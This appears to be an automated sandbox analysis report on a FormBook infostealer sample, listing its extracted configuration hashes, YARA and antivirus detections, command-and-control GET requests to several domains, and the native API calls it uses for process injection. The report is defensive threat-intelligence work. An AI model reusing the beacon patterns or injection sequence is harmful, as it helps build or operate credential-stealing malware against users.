Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbc", "KEY1_OFFSET 0x1d6b1", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1d7b6", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1c363", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9d07c71e", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f716fd2", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: 4NoiNHCNoU.exe	Virustotal: Detection: 30%			Perma Link
Source: 4NoiNHCNoU.exe	ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: 4NoiNHCNoU.exe

Joe Sandbox ML: detected

Source: 2.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: 4NoiNHCNoU.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: 4NoiNHCNoU.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Binary contains paths to debug symbols

Show sources

Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, help.exe, 00000006.00000002.1005392227.000000000359F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.687730403.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000002.00000002.709206152.0000000001ABF000.00000040.00000001.sdmp, help.exe, 00000006.00000002.1004484328.0000000000E80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, help.exe
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000002.00000000.666209979.0000000000FA2000.00000002.00020000.sdmp, help.exe, 00000006.00000002.1005392227.000000000359F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: help.pdbGCTL source: AddInProcess32.exe, 00000002.00000002.709813502.0000000001DC0000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: AddInProcess32.exe, 00000002.00000002.709813502.0000000001DC0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.687730403.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then jmp 03142656h
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov esp, ebp
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then push dword ptr [ebp-24h]
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then xor edx, edx
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then push dword ptr [ebp-20h]
Source: C:\Users\user\Desktop\4NoiNHCNoU.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh

Networking:

Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=dtwHAOGjt/+zpbp36VfwrlpLqx9PqTyEssCs5akk3XqA2N3Rg4iBrIryvB1IVPRuISQ2 HTTP/1.1Host: www.hull3dprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=xHc9ODtVxj0eUWmi3yu1PHJO+9FS2s4H+8Xc5Nf8URN5DAD0y+vEo6QceVJID6bTGhq7 HTTP/1.1Host: www.artdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?YP7HsZXp=aeYSUm77/4pN8ZT/uXkxszyZjPiqX70cnyvz0SpaHLBaMQqGqlwCHFzYALKMdCUG+bHZ&CTvp=fvUh_lYhi2Qtqn HTTP/1.1Host: www.milkandmemories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=hK2+H65jJ6ehVdA52W/5RiHO6KAeaXXnYMVt3i9x6BH/1kcuoogx/NrTS0USn7suDUfO HTTP/1.1Host: www.monalizacos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 199.59.242.153 199.59.242.153
Source: Joe Sandbox View	IP Address: 216.58.207.179 216.58.207.179
Source: Joe Sandbox View	IP Address: 216.58.207.179 216.58.207.179

Source: Joe Sandbox View	ASN Name: IT7NETCA IT7NETCA
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=dtwHAOGjt/+zpbp36VfwrlpLqx9PqTyEssCs5akk3XqA2N3Rg4iBrIryvB1IVPRuISQ2 HTTP/1.1Host: www.hull3dprints.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=xHc9ODtVxj0eUWmi3yu1PHJO+9FS2s4H+8Xc5Nf8URN5DAD0y+vEo6QceVJID6bTGhq7 HTTP/1.1Host: www.artdonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?YP7HsZXp=aeYSUm77/4pN8ZT/uXkxszyZjPiqX70cnyvz0SpaHLBaMQqGqlwCHFzYALKMdCUG+bHZ&CTvp=fvUh_lYhi2Qtqn HTTP/1.1Host: www.milkandmemories.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /wdva/?CTvp=fvUh_lYhi2Qtqn&YP7HsZXp=hK2+H65jJ6ehVdA52W/5RiHO6KAeaXXnYMVt3i9x6BH/1kcuoogx/NrTS0USn7suDUfO HTTP/1.1Host: www.monalizacos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.hull3dprints.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Jan 2021 16:10:14 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
Source: 4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adb
Source: 4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: 4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1$
Source: 4NoiNHCNoU.exe, 00000000.00000002.680921348.0000000008E82000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: 4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g$
Source: 4NoiNHCNoU.exe, 00000000.00000003.672814829.0000000008E81000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: 4NoiNHCNoU.exe, 00000000.00000003.659052889.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj$
Source: 4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: 4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: 4NoiNHCNoU.exe, 00000000.00000002.673545069.000000000328F000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: 4NoiNHCNoU.exe, 00000000.00000002.673522377.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: http://statcounter.com/
Source: explorer.exe, 00000003.00000002.1005683210.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.693818939.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 4NoiNHCNoU.exe, 00000000.00000002.673522377.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 4NoiNHCNoU.exe, 00000000.00000002.673522377.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: 4NoiNHCNoU.exe, 00000000.00000002.673522377.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.comT
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
Source: help.exe, 00000006.00000002.1005440745.0000000003A8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.708829602.0000000001510000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.678246488.0000000004BB9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.708860418.0000000001540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.678514440.0000000004D25000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1003763162.00000000005D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1004298998.0000000000C50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.708551129.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1004347385.0000000000C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041A050 NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041A100 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00419F20 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00419FD0 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041A04A NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_0041A0FA NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00419F72 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_00419FCA NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A098F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A095D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A099D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A098A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A095F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09FE0 NtCreateMutant,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A0A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 2_2_01A09760 NtOpenProcess,
